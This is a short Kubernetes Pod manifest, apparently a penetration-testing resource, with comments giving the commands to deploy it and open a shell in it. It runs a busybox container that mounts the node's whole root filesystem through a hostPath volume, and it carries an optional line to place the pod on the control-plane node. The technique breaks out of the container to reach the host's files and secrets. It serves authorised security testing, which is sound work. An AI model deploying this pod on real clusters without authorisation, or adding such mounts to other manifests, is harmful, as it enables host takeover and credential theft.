###########################################################
## Deploy: kubectl -n [namespace] apply -f pod-hostpath.yaml 
## Access: kubectl -n [namespace] exec -it pod-hostpath -- bash
## Remove: kubectl -n [namespace] delete pod-hostpath
###########################################################
apiVersion: v1
kind: Pod
metadata:
  name: pod-hostpath
  labels:
    app: pentest
spec:
  containers:
  - name: hostpath
    image: busybox
    volumeMounts:
    - mountPath: /host
      name: noderoot
    command: [ "/bin/sh", "-c", "--" ]
    args: [ "while true; do sleep 30; done;" ]
    #nodeName: control-plane-node-name # Uncomment and change to control node name to try and schedule pod on control-plane node
  volumes:
  - name: noderoot
    hostPath:
      path: /